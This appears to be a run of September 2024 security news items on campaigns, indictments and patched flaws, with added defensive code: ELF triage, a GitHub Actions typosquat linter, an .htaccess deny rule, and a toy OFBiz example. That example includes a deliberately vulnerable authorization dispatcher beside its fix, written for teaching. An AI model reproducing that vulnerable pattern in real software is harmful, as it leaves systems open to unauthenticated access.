North Korea's targeting of Web3 organizations also goes beyond social engineering to encompass software supply chain attacks, as observed in the incidents aimed at 3CX and JumpCloud in recent years.
"Once a foothold is established via malware, the attackers pivot to password managers to steal credentials, perform internal reconnaissance via code repos and documentation, and pivot into the cloud hosting environment to reveal hot wallet keys and eventually drain funds," Mandiant said.
The disclosure comes amid a warning from the U.S. Federal Bureau of Investigation (FBI) about North Korean threat actors' targeting of the cryptocurrency industry using "highly tailored, difficult-to-detect social engineering campaigns."
These ongoing efforts, which impersonate recruiting firms or individuals that a victim may know personally or indirectly with offers of employment or investment, are seen as a conduit for brazen crypto heists designed to generate illicit income for the hermit kingdom, which has been the subject of international sanctions.
Notable among the tactics employed include identifying cryptocurrency-related businesses of interest, conducting extensive pre-operational research on their targets before initiating contact, and concocting personalized fake scenarios in an attempt to appeal to prospective victims and increase the likelihood of success of their attacks.
"The actors may reference personal information, interests, affiliations, events, personal relationships, professional connections, or details a victim may believe are known to few others," the FBI said, highlighting attempts to build rapport and eventually deliver malware.
"If successful in establishing bidirectional contact, the initial actor, or another member of the actor's team, may spend considerable time engaging with the victim to increase the sense of legitimacy and engender familiarity and trust."
FBI Cracks Down on Dark Web Marketplace Managed by Russian and Kazakh Nationals
8.9.24 BigBrothers The Hacker News
Two men have been indicted in the U.S. for their alleged involvement in managing a dark web marketplace called WWH Club that specializes in the sale of sensitive personal and financial information.
Alex Khodyrev, a 35-year-old Kazakhstan national, and Pavel Kublitskii, a 37-year-old Russian national, have been charged with conspiracy to commit access device fraud and conspiracy to commit wire fraud.
Khodyrev and Kublitskii, between 2014 and 2024, acted as the main administrators of WWH Club (wwh-club[.]ws) and various other sister sites – wwh-club[.]net, center-club[.]pw, opencard[.]pw, skynetzone[.]org – that functioned as dark web marketplaces, forums, and training centers to enable cybercrime.
The indictment follows an investigation launched by the U.S. Federal Bureau of Investigation (FBI) in July 2020, after agents determined that WWH Club's primary domain (wwh-club[.]ws) resolved to an IP address belonging to DigitalOcean, allowing them to serve a federal search warrant on the infrastructure company.
"WWH Club and sister site members used the marketplaces to buy and sell stolen personal identifying information (PII), credit card and bank account information, and computer passwords, among other sensitive information," the U.S. Department of Justice (DoJ) said.
The forums, on the other hand, acted as a hotspot for discussions on best practices for committing fraud, launching cyber attacks, and evading law enforcement.
Furthermore, the darknet marketplace offered online courses for aspiring and active cybercriminals on how to conduct fraud. The advertised cost of a course ranged from 10,000 rubles to 60,000 rubles (about $110 to $664 as of September 7, 2024), plus an additional $200 for training materials.
Court documents show that undercover FBI agents signed up for the site and paid approximately $1,000 in bitcoin to attend a training course offered by the platform that included topics such as the sale of sensitive information, DDoS and hacking services, credit card skimmers, and brute-force programs.
"The training was conducted through a chat function on the forum to a class of approximately 50 students; the various instructors provided training in text format rather than audible instruction," the criminal complaint reads. "It was apparent the purpose of the training was to educate individuals on how to obtain and use stolen credit card data and PII to generate fraudulent proceeds."
WWH Club is estimated to have had 353,000 users worldwide as of March 2023, up from 170,000 registered users in July 2020. Both Khodyrev and Kublitskii are believed to have profited from the membership fees, tuition fees, and advertising revenue.
Flashpoint, in a report published last month, said WWH Club remains operational despite the law enforcement effort, and that "its other administrators are attempting to distance themselves from Kublitskii and Khodyrev."
Khodyrev and Kublitskii "had been living in Miami for the past two years, while secretly continuing to administer WWH Club and its sister dark web marketplaces, forums, and schools," the DoJ said.
If convicted on all counts, they could each face up to 20 years in federal prison. The indictment also seeks the forfeiture of Khodyrev's 2023 Mercedes-Benz G63 AMG sport utility vehicle and Kublitskii's 2020 Cadillac CT5 Sport sedan, which are said to have been purchased using proceeds from their criminal enterprise.
SonicWall Urges Users to Patch Critical Firewall Flaw Amid Possible Exploitation
7.9.24 Vulnerebility The Hacker News
SonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible.
The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10.
"An improper access control vulnerability has been identified in the SonicWall SonicOS management access and SSLVPN, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash," SonicWall said in an updated advisory.
With the latest development, the company has revealed that CVE-2024-40766 also impacts the firewall's SSLVPN feature. The issue has been addressed in the below versions -
SOHO (Gen 5 Firewalls) - 5.9.2.14-13o
Gen 6 Firewalls - 6.5.2.8-2n (for SM9800, NSsp 12400, and NSsp 12800) and 6.5.4.15.116n (for other Gen 6 Firewall appliances)
The network security vendor has since updated the bulletin to reflect the possibility that it may have been actively exploited.
"This vulnerability is potentially being exploited in the wild," it added. "Please apply the patch as soon as possible for affected products."
As temporary mitigations, it's recommended to restrict firewall management to trusted sources or disable firewall WAN management from Internet access. For SSLVPN, it's advised to limit access to trusted sources, or disable internet access altogether.
Additional mitigations include enabling multi-factor authentication (MFA) with one-time passwords (OTPs) for all SSLVPN users. SonicWall also recommends that customers running Gen 5 and Gen 6 firewalls with SSLVPN users who have locally managed accounts have those users update their passwords immediately to prevent unauthorized access.
There are currently no details about how the flaw may have been weaponized in the wild, but Chinese threat actors have, in the past, exploited unpatched SonicWall Secure Mobile Access (SMA) 100 appliances to establish long-term persistence.
GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet Malware
7.9.24 BotNet The Hacker News
A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk.
The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances.
In mid-July, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The Shadowserver Foundation said it detected exploitation attempts against its honeypot sensors starting July 9, 2024.
According to Fortinet FortiGuard Labs, the flaw has been observed to deliver GOREVERSE, a reverse proxy server designed to establish a connection with a command-and-control (C2) server for post-exploitation activity.
These attacks are said to target IT service providers in India, technology companies in the U.S., government entities in Belgium, and telecommunications companies in Thailand and Brazil.
The GeoServer flaw has also served as a conduit for Condi and a Mirai botnet variant dubbed JenX, and for at least four types of cryptocurrency miners, one of which is retrieved from a fake website that impersonates the Institute of Chartered Accountants of India (ICAI).
Perhaps the most notable of the attack chains leveraging the flaw is the one that propagates an advanced Linux backdoor called SideWalk, which is attributed to a Chinese threat actor tracked as APT41.
The starting point is a shell script that downloads ELF binaries built for the ARM, MIPS, and x86 architectures. The binary, in turn, extracts the C2 server address from an encrypted configuration, connects to it, and receives further commands to execute on the compromised device.
This includes running a legitimate tool known as Fast Reverse Proxy (FRP) to evade detection by creating an encrypted tunnel from the host to the attacker-controlled server, allowing for persistent remote access, data exfiltration, and payload deployment.
"The primary targets appear to be distributed across three main regions: South America, Europe, and Asia," security researchers Cara Lin and Vincent Li said.
"This geographical spread suggests a sophisticated and far-reaching attack campaign, potentially exploiting vulnerabilities common to these diverse markets or targeting specific industries prevalent in these areas."
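When a dropper like the one described above leaves several ELF files behind, the first triage step is to sort them by target architecture so each sample goes to the right emulator or disassembler. The parser below reads only the ELF identification bytes, e_type and e_machine; it is an added example, not Fortinet's tooling, and the "drop set" it runs over consists of constructed 20-byte header stubs rather than real samples.

```python
"""Classify dropped ELF payloads by target architecture from the ELF header alone.

Added example for this page, not Fortinet's code. The 20-byte headers are constructed
stubs carrying only the fields this parser reads; they are not real malware samples.
"""
import struct

ELF_MAGIC = b"\x7fELF"
# e_machine values from the ELF specification.
MACHINES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}
TYPES = {1: "relocatable", 2: "executable", 3: "shared-object/PIE", 4: "core"}


def classify_elf(data: bytes):
    """Return {'bits','endian','type','machine'} for an ELF header, or None if not ELF."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None                     # corrupt identification bytes
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])   # fields follow e_ident[16]
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "type": TYPES.get(e_type, f"unknown({e_type})"),
        "machine": MACHINES.get(e_machine, f"unknown({e_machine})"),
    }


def triage(payloads: dict) -> dict:
    """Group payload names by machine string, putting non-ELF data under 'not-elf'."""
    groups = {}
    for name, blob in payloads.items():
        info = classify_elf(blob)
        key = info["machine"] if info else "not-elf"
        groups.setdefault(key, []).append(name)
    return groups


def stub_header(ei_class, ei_data, e_type, e_machine) -> bytes:
    """Build a constructed 20-byte header: 16-byte e_ident, then e_type and e_machine."""
    endian = "<" if ei_data == 1 else ">"
    return (ELF_MAGIC + bytes([ei_class, ei_data, 1]) + b"\x00" * 9
            + struct.pack(endian + "HH", e_type, e_machine))


# Constructed drop set mirroring the ARM / MIPS / x86 spread described above.
SAMPLE_DROP = {
    "bin.arm":   stub_header(1, 1, 2, 40),    # 32-bit LE ARM executable
    "bin.mips":  stub_header(1, 2, 2, 8),     # 32-bit BE MIPS executable
    "bin.x86":   stub_header(1, 1, 2, 3),     # 32-bit LE x86 executable
    "bin.x64":   stub_header(2, 1, 3, 62),    # 64-bit LE x86-64 PIE
    "bin.arm64": stub_header(2, 1, 2, 183),   # 64-bit LE AArch64 executable
    "loader.sh": b"#!/bin/sh\nwget ...\n",    # the stage-0 script, not an ELF
}

if __name__ == "__main__":
    for machine, names in triage(SAMPLE_DROP).items():
        print(f"{machine:>8}: {', '.join(names)}")
```

Reading e_ident byte 5 before unpacking matters because MIPS router firmware is usually big-endian while the x86 and ARM builds are little-endian; a parser that assumes one byte order silently misreports the other half of the drop. The same header fields are what file(1) prints, so this is a way to get that classification inside a pipeline without shelling out.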
The development comes as CISA this week added to its KEV catalog two flaws found in 2021 in DrayTek VigorConnect (CVE-2021-20123 and CVE-2021-20124, CVSS scores: 7.5) that could be exploited to download arbitrary files from the underlying operating system with root privileges.
GitHub Actions Vulnerable to Typosquatting, Exposing Developers to Hidden Malicious Code
7.9.24 Vulnerebility The Hacker News
Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages.
These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com).
Adversaries targeting open-source repositories across platforms have relied on developers making typing errors to initiate software supply chain attacks through PyPI, npm, Maven Central, NuGet, RubyGems, and Crate.
The latest findings from cloud security firm Orca show that even GitHub Actions, a continuous integration and continuous delivery (CI/CD) platform, is not immune from the threat.
"If developers make a typo in their GitHub Action that matches a typosquatter's action, applications could be made to run malicious code without the developer even realizing," security researcher Ofir Yakobi said in a report shared with The Hacker News.
The attack is possible because anyone can publish a GitHub Action by creating a GitHub account with a temporary email address. Given that actions run within the context of a user's repository, a malicious action could be used to tamper with the source code, steal secrets, and deliver malware.
All that the technique involves is for the attacker to create organizations and repositories with names that closely resemble popular or widely-used GitHub Actions.
If a user makes inadvertent spelling errors when setting up a GitHub action for their project and that misspelled version has already been created by the adversary, then the user's workflow will run the malicious action as opposed to the intended one.
"Imagine an action that exfiltrates sensitive information or modifies code to introduce subtle bugs or backdoors, potentially affecting all future builds and deployments," Yakobi said.
"In fact, a compromised action can even leverage your GitHub credentials to push malicious changes to other repositories within your organization, amplifying the damage across multiple projects."
Orca said that a search on GitHub revealed as many as 198 files that invoke "action/checkout" or "actons/checkout" instead of "actions/checkout" (note the missing "s" and "i"), putting all those projects at risk.
This form of typosquatting is appealing to threat actors because it's a low-cost, high-impact attack that could result in powerful software supply chain compromises, affecting several downstream customers all at once.
Users are advised to double-check actions and their names to ensure they are referencing the correct GitHub organization, stick to actions from trusted sources, and periodically scan their CI/CD workflows for typosquatting issues.
"This experiment highlights how easy it is for attackers to exploit typosquatting in GitHub Actions and the importance of vigilance and best practices in preventing such attacks," Yakobi said.
"The actual problem is even more concerning because here we are only highlighting what happens in public repositories. The impact on private repositories, where the same typos could be leading to serious security breaches, remains unknown."
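One way to do the periodic workflow scan recommended above, as an added example that is not Orca's tooling: the linter pulls every `uses:` reference out of a workflow file, compares the owner/repo part against an allowlist of reviewed actions, reports near-misses by edit distance (which catches both "actons/checkout" and "action/checkout"), and separately reports references not pinned to a full commit SHA. The allowlist is a constructed starting point, the workflow is constructed, and the 40-hex SHA in it is invented.

```python
"""Lint GitHub Actions workflows for typosquatted and unpinned `uses:` references.

Added example for this page, not Orca's tooling. The allowlist is a constructed
starting point, the workflow is constructed, and the commit SHA in it is invented.
"""
import re

# Actions the organisation has reviewed (assumption: replace with your own allowlist).
KNOWN_ACTIONS = {
    "actions/checkout", "actions/setup-node", "actions/setup-python",
    "actions/upload-artifact", "actions/download-artifact", "actions/cache",
}
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.MULTILINE)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot near-misses of known action names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lint_workflow(text: str, max_distance: int = 2) -> list[dict]:
    """Return one finding per problem: a typosquat, an unknown action, or an unpinned ref."""
    findings = []
    for match in USES_RE.finditer(text):
        ref = match.group(1)
        if ref.startswith(("./", "docker://")):
            continue                                    # local or container action
        path, _, version = ref.partition("@")
        owner_repo = "/".join(path.split("/")[:2])      # drop any sub-path inside the repo
        if owner_repo not in KNOWN_ACTIONS:
            closest = min(KNOWN_ACTIONS, key=lambda k: levenshtein(owner_repo, k))
            if levenshtein(owner_repo, closest) <= max_distance:
                findings.append({"ref": ref, "issue": f"possible typosquat of {closest}"})
            else:
                findings.append({"ref": ref, "issue": "action not on allowlist"})
        if not SHA_RE.match(version):
            findings.append({"ref": ref, "issue": "not pinned to a full commit SHA"})
    return findings


# Constructed workflow: one correct reference, two typos, one unreviewed action.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actons/checkout@v4
      - uses: action/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: acme/internal-release@v2
      - run: make test
"""

if __name__ == "__main__":
    for f in lint_workflow(SAMPLE_WORKFLOW):
        print(f"{f['ref']}: {f['issue']}")
```

Pinning to a commit SHA and allowlisting are complementary: the SHA stops a tag being re-pointed at malicious code, but a SHA from the typosquatter's repository is still the typosquatter's code, which is why the name check runs regardless of pinning. GitHub's organisation-level "allow select actions" policy enforces the same allowlist at the platform instead of in a linter, and the two are best used together.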
Critical Security Flaw Found in LiteSpeed Cache Plugin for WordPress
6.9.24 Vulnerebility The Hacker News
Cybersecurity researchers have discovered yet another critical security flaw in the LiteSpeed Cache plugin for WordPress that could allow unauthenticated users to take control of arbitrary accounts.
The vulnerability, tracked as CVE-2024-44000 (CVSS score: 7.5), impacts versions before and including 6.4.1. It has been addressed in version 6.5.0.1.
"The plugin suffers from an unauthenticated account takeover vulnerability which allows any unauthenticated visitor to gain authentication access to any logged-in users and at worst can gain access to an Administrator level role after which malicious plugins could be uploaded and installed," Patchstack researcher Rafie Muhammad said.
The discovery follows an extensive security analysis of the plugin, which previously led to the identification of a critical privilege escalation flaw (CVE-2024-28000, CVSS score: 9.8). LiteSpeed Cache is a popular caching plugin for the WordPress ecosystem with over 5 million active installations.
The new vulnerability stems from the fact that a debug log file named "/wp-content/debug.log" is publicly exposed, which makes it possible for unauthenticated attackers to view potentially sensitive information contained in the file.
This could also include user cookie information present within HTTP response headers, effectively allowing users to log in to a vulnerable site with any session that is actively valid.
The flaw's lower severity reflects the prerequisite that the plugin's debug feature must be enabled on the WordPress site for exploitation to succeed. It could also affect sites that enabled the debug log at some point in the past but never removed the debug file.
It's important to note that this feature is disabled by default. The patch addresses the problem by moving the log file to a dedicated folder within the LiteSpeed plugin folder ("/wp-content/litespeed/debug/"), randomizing filenames, and dropping the option to log cookies in the file.
Users are advised to check their installations for the presence of "/wp-content/debug.log" and purge it if the debugging feature has (or had) been enabled.
It's also recommended to set an .htaccess rule to deny direct access to the log files, as malicious actors could still reach the new log file directly if they guess its filename by trial and error.
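An .htaccess rule of the kind recommended above, as an added example that is not from Patchstack or the plugin's own configuration. It assumes Apache 2.4 `Require` syntax, that the first snippet is placed in wp-content/ (so it also covers the plugin's new debug directory), and that the second is placed in the new directory itself so the protection does not depend on the randomised filenames ending in a particular extension.

```apache
# --- wp-content/.htaccess (added example) ---
# Block direct requests for any *.log below wp-content/, including the old debug.log.
<FilesMatch "\.log$">
    Require all denied
</FilesMatch>

# --- wp-content/litespeed/debug/.htaccess (added example) ---
# Belt and braces: deny the whole directory, whatever the randomised filenames look like.
Require all denied
```

Apache 2.2 uses `Order allow,deny` and `Deny from all` instead of `Require all denied`. LiteSpeed Web Server reads .htaccess files, but nginx does not, so sites behind nginx need the equivalent `location` block in the server configuration; in every case, confirm the rule with a direct request for the log path and expect a 403.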
"This vulnerability highlights the critical importance of ensuring the security of performing a debug log process, what data should not be logged, and how the debug log file is managed," Muhammad said.
Apache OFBiz Update Fixes High-Severity Flaw Leading to Remote Code Execution
6.9.24 Vulnerebility The Hacker News
A new security flaw has been addressed in the Apache OFBiz open-source enterprise resource planning (ERP) system that, if successfully exploited, could lead to unauthenticated remote code execution on Linux and Windows.
The high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affects all versions of the software before 18.12.16.
"An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server," Rapid7 security researcher Ryan Emmons said in a new report.
It's worth noting that CVE-2024-45195 is a bypass for a sequence of issues, CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856, which were addressed by the project maintainers over the past few months.
Both CVE-2024-32113 and CVE-2024-38856 have since come under active exploitation in the wild, with the former leveraged to deploy the Mirai botnet malware.
Rapid7 said all three older shortcomings stem from the "ability to desynchronize the controller and view map state," a problem that was never fully remediated in any of the patches.
A consequence of the vulnerability is that it could be abused by attackers to execute code or SQL queries and achieve remote code execution without authentication.
The latest patch put in place "validates that a view should permit anonymous access if a user is unauthenticated, rather than performing authorization checks purely based on the target controller."
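A toy model of the bug class the text describes and of the shape of the fix, added here as an example and not Apache OFBiz code: the request map and view map, their entries, and the `view` override parameter are invented to show the pattern, not OFBiz's real routing. The vulnerable dispatcher authorises on the controller entry for the requested URI and then renders whatever view was resolved; the fixed one also checks that the view about to render permits anonymous access.

```python
"""Toy model of controller/view desynchronisation and of the fix described above.

Added example for this page, not Apache OFBiz code; the maps, names and the
`view` override parameter are invented to show the pattern, not OFBiz's real routing.
"""
from typing import Optional

# Request map (the "controller"): which URIs need a login, and their default view.
REQUEST_MAP = {
    "public-home":  {"auth": False, "view": "home"},
    "admin-report": {"auth": True,  "view": "report"},
}
# View map: which rendered views may be shown to an anonymous user.
VIEW_MAP = {
    "home":   {"anonymous": True},
    "report": {"anonymous": False},
}


def resolve_view(uri: str, view_override: Optional[str]) -> str:
    """The desync: the view actually rendered can be chosen by a request parameter."""
    return view_override or REQUEST_MAP[uri]["view"]


def dispatch_vulnerable(uri: str, view_override: Optional[str], authenticated: bool) -> str:
    """Authorises on the controller entry only, then renders whatever view was resolved."""
    if REQUEST_MAP[uri]["auth"] and not authenticated:
        return "403"
    return f"render:{resolve_view(uri, view_override)}"


def dispatch_fixed(uri: str, view_override: Optional[str], authenticated: bool) -> str:
    """Also requires that the view about to render permits anonymous access."""
    if REQUEST_MAP[uri]["auth"] and not authenticated:
        return "403"
    view = resolve_view(uri, view_override)
    if not authenticated and not VIEW_MAP[view]["anonymous"]:
        return "403"
    return f"render:{view}"


if __name__ == "__main__":
    # Unauthenticated request to a public URI, steering the view to the protected report.
    print("vulnerable:", dispatch_vulnerable("public-home", "report", authenticated=False))
    print("fixed:     ", dispatch_fixed("public-home", "report", authenticated=False))
```

The general lesson is that an authorisation decision must be made on the same object that is ultimately acted on; when routing and rendering are keyed on different request fields, each earlier patch that blocks one way of steering the second field leaves the next one open, which is the "bypass for a sequence of issues" pattern described above.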
Apache OFBiz version 18.12.16 also addresses a critical server-side request forgery (SSRF) vulnerability (CVE-2024-45507, CVSS score: 9.8) that could lead to unauthorized access and system compromise by taking advantage of a specially crafted URL.
Pavel Durov Criticizes Outdated Laws After Arrest Over Telegram Criminal Activity
6.9.24 BigBrothers The Hacker News
Telegram CEO Pavel Durov has broken his silence nearly two weeks after his arrest in France, stating the charges are misguided.
"If a country is unhappy with an internet service, the established practice is to start a legal action against the service itself," Durov said in a 600-word statement on his Telegram account.
"Using laws from the pre-smartphone era to charge a CEO with crimes committed by third-parties on the platform he manages is a misguided approach."
Durov was charged late last month for enabling various forms of criminal activity on Telegram, including drug trafficking and money laundering, following a probe into an unnamed person's distribution of child sexual abuse material.
He also highlighted the struggles to balance both privacy and security, noting that Telegram is ready to exit markets that aren't compatible with its mission to "protect our users in authoritarian regimes."
Durov also blamed "growing pains that made it easier for criminals to abuse our platform." The popular messaging app recently crossed 950 million monthly active users.
"That's why I made it my personal goal to ensure we significantly improve things in this regard," he said. "We've already started that process internally, and I will share more details on our progress with you very soon."
The company has since updated its FAQ to allow users to report illegal content within private and group chats by flagging it for review using a dedicated "Report" button, a major policy shift and a feature that was previously off-limits.
Durov's statement, however, doesn't delve into the lack of end-to-end encryption (E2EE) protections by default, which users have to explicitly enable in one-to-one chats.
"It is also a 'cloud messenger,' meaning that all messages live on Telegram's servers rather than the user's device," Moxie Marlinspike, creator of the E2EE messaging app Signal, pointed out.
"With one query, the Russian Telegram team can get every message the French president has ever sent or received to his contacts, every message those contacts have ever sent or received to their contacts, every message those contacts' contacts have ever sent or received, etc."
Matthew Green, a security researcher and an associate professor of computer science at Johns Hopkins University, further called out the platform for making end-to-end encryption onerous to enable, a process that requires at least four clicks on Telegram's iOS app.
"The feature is explicitly not turned on for the vast majority of conversations, and is only available for one-on-one conversations, and never for group chats with more than two people in them," Green said.
"As a kind of a weird bonus, activating end-to-end encryption in Telegram is oddly difficult for non-expert users to actually do. Secret Chats only works if your conversation partner happens to be online when you do this."
Chinese-Speaking Hacker Group Targets Human Rights Studies in Middle East
6.9.24 APT The Hacker News
Unnamed government entities in the Middle East and Malaysia are the target of a persistent cyber campaign orchestrated by a threat actor known as Tropic Trooper since June 2023.
"Sighting this group's [Tactics, Techniques, and Procedures] in critical governmental entities in the Middle East, particularly those related to human rights studies, marks a new strategic move for them," Kaspersky security researcher Sherif Magdy said.
The Russian cybersecurity vendor said it detected the activity in June 2024 upon discovering a new version of the China Chopper web shell, a tool shared by many Chinese-speaking threat actors for remote access to compromised servers, on a public web server hosting an open-source content management system (CMS) called Umbraco.
The attack chain is designed to deliver a malware implant named Crowdoor, a variant of the SparrowDoor backdoor documented by ESET back in September 2021. The efforts were ultimately unsuccessful.
Tropic Trooper, also known by the names APT23, Earth Centaur, KeyBoy, and Pirate Panda, is known for its targeting of government, healthcare, transportation, and high-tech industries in Taiwan, Hong Kong, and the Philippines. The Chinese-speaking collective has been assessed to be active since 2011, sharing close ties with another intrusion set tracked as FamousSparrow.
The latest intrusion highlighted by Kaspersky is significant for compiling the China Chopper web shell as a .NET module of Umbraco CMS, with follow-on exploitation leading to the deployment of tools for network scanning, lateral movement, and defense evasion, before launching Crowdoor using DLL side-loading techniques.
It's suspected that the web shells are delivered by exploiting known security vulnerabilities in publicly accessible web applications, such as Adobe ColdFusion (CVE-2023-26360) and Microsoft Exchange Server (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207).
Crowdoor, first observed in June 2023, also functions as a loader to drop Cobalt Strike and maintain persistence on the infected hosts, while also acting as a backdoor to harvest sensitive information, launch a reverse shell, erase other malware files, and terminate itself.
"When the actor became aware that their backdoors were detected, they tried to upload newer samples to evade detection, thereby increasing the risk of their new set of samples being detected in the near future," Magdy noted.
"The significance of this intrusion lies in the sighting of a Chinese-speaking actor targeting a content management platform that published studies on human rights in the Middle East, specifically focusing on the situation around the Israel-Hamas conflict."
"Our analysis of this intrusion revealed that this entire system was the sole target during the attack, indicating a deliberate focus on this specific content."
Veeam Releases Security Updates to Fix 18 Flaws, Including 5 Critical Issues
6.9.24 Vulnerability The Hacker News
Veeam has shipped security updates to address a total of 18 security flaws impacting its software products, including five critical vulnerabilities that could result in remote code execution.
The list of shortcomings is below -
CVE-2024-40711 (CVSS score: 9.8) - A vulnerability in Veeam Backup & Replication that allows unauthenticated remote code execution.
CVE-2024-42024 (CVSS score: 9.1) - A vulnerability in Veeam ONE that enables an attacker in possession of the Agent service account credentials to perform remote code execution on the underlying machine
CVE-2024-42019 (CVSS score: 9.0) - A vulnerability in Veeam ONE that allows an attacker to access the NTLM hash of the Veeam Reporter Service service account
CVE-2024-38650 (CVSS score: 9.9) - A vulnerability in Veeam Service Provider Console (VPSC) that allows a low privileged attacker to access the NTLM hash of the service account on the server
CVE-2024-39714 (CVSS score: 9.9) - A vulnerability in VPSC that permits a low-privileged user to upload arbitrary files to the server, resulting in remote code execution on the server
In addition, the September 2024 updates address 13 other high-severity flaws that could permit privilege escalation, multi-factor authentication (MFA) bypass, and code execution with elevated permissions.
All the issues have been addressed in the below versions -
Veeam Backup & Replication 12.2 (build 12.2.0.334)
Veeam Agent for Linux 6.2 (build 6.2.0.101)
Veeam ONE v12.2 (build 12.2.0.4093)
Veeam Service Provider Console v8.1 (build 8.1.0.21377)
Veeam Backup for Nutanix AHV Plug-In v12.6.0.632
Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In v12.5.0.299
With flaws in Veeam software becoming a lucrative target for threat actors looking to deploy ransomware, users are advised to update to the latest version as soon as possible to mitigate potential threats.
U.S. Seizes 32 Pro-Russian Propaganda Domains in Major Disinformation Crackdown
5.9.24 BigBrothers The Hacker News
The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of 32 internet domains used by a pro-Russian propaganda operation called Doppelganger as part of a sweeping set of actions.
Accusing the Russian government-directed foreign malign influence campaign of violating U.S. money laundering and criminal trademark laws, the agency called out companies Social Design Agency (SDA), Structura National Technology (Structura), and ANO Dialog for working at the behest of the Russian Presidential Administration.
The goal, it said, is to "covertly spread Russian government propaganda with the aim of reducing international support for Ukraine, bolstering pro-Russian policies and interests, and influencing voters in U.S. and foreign elections, including the U.S. 2024 Presidential Election."
Among the methods Doppelganger used to drive viewership to the cybersquatted media domains encompassed the deployment of "influencers" worldwide, paid social media ads, and the creation of social media profiles posing as U.S. (or other non-Russian) citizens to post comments on social media platforms with links to the domains in an attempt to redirect unsuspecting viewers.
The sites dismantled by the U.S. government were filled with Russian government propaganda created by the Kremlin to reduce international support for Ukraine, bolster pro-Russian policies and interests, and influence voters in the U.S. and other countries.
The complete list of domains, which mimic legitimate news outlets like Der Spiegel, Fox News, Le Monde, and The Washington Post, is as follows -
Concurrent with the domain seizures, the Treasury Department sanctioned 10 individuals and two entities for engaging in efforts to influence and undermine confidence in the electoral process.
Specifically, it alleged that executives at RT, Russia's state-funded news media publication, covertly recruited unwitting American influencers into its campaign efforts. It's also said to have used a front company to conceal its own involvement or that of the government.
"At Putin's direction, Russian companies SDA, Structura, and ANO Dialog used cybersquatting, fabricated influencers, and fake profiles to covertly promote AI-generated false narratives on social media," said Deputy Attorney General Lisa Monaco. "Those narratives targeted specific American demographics and regions in a calculated effort to subvert our election."
In conjunction, the DoJ also announced the indictment of two RT employees for funneling $9.7 million to further "hidden" Russian government messaging and disinformation by disseminating thousands of videos via a Tennessee-based content creation firm with an ultimate aim to sow discord among Americans.
Court documents allege that Kostiantyn Kalashnikov, 31, and Elena Afanasyeva, 27, along with other RT employees financed the company's operations to publish English-language videos across TikTok, Instagram, X, and YouTube, racking up millions of views. Kalashnikov and Afanasyeva masqueraded as an outside editing team.
The company is estimated to have posted nearly 2,000 videos since its launch in November 2023, sharing commentary related to immigration, inflation, and other topics related to domestic and foreign policy. The videos have been watched over 16 million times on YouTube alone.
"While the views expressed in the videos are not uniform, most are directed to the publicly stated goals of the Government of Russia and RT — to amplify domestic divisions in the United States," the DoJ said, adding the company "never disclosed to its viewers that it was funded and directed by RT."
The two Russian nationals have been charged with conspiracy to violate the Foreign Agents Registration Act (FARA), which carries a maximum sentence of five years in prison, and conspiracy to commit money laundering, which carries a maximum sentence of 20 years in prison.
Furthermore, the State Department has instituted a new policy to restrict visa issuance to individuals acting on behalf of Kremlin-supported media organizations and using them as cover to engage in clandestine influence activities.
It has also designated Rossiya Segodnya, and subsidiaries RIA Novosti, RT, TV-Novosti, Ruptly, and Sputnik, as foreign missions, requiring them to notify the Department of all personnel working in the country, as well as disclose all real property they hold within U.S. borders.
Taken together, the actions signal a broader push by the U.S. government to clamp down on Russian-backed disinformation operations ahead of November's general election.
The development comes amid revelations that a Chinese influence operation dubbed Spamouflage has ramped up its efforts to influence online discourse around the U.S. elections, creating fake personas across social media platforms to push divisive narratives about sensitive social issues by capitalizing on a polarized information environment.
"These accounts have seeded and amplified content denigrating Democratic and Republican candidates, sowing doubt in the legitimacy of the U.S. electoral process, and spreading divisive narratives about sensitive social issues including gun control, homelessness, drug abuse, racial inequality, and the Israel-Hamas conflict," Graphika said.
Malware Attackers Using MacroPack to Deliver Havoc, Brute Ratel, and PhantomCore
5.9.24 Virus The Hacker News
Threat actors are likely employing a tool designated for red teaming exercises to serve malware, according to new findings from Cisco Talos.
The program in question is a payload generation framework called MacroPack, which is used to generate Office documents, Visual Basic scripts, Windows shortcuts, and other formats for penetration testing and social engineering assessments. It was developed by French developer Emeric Nasi.
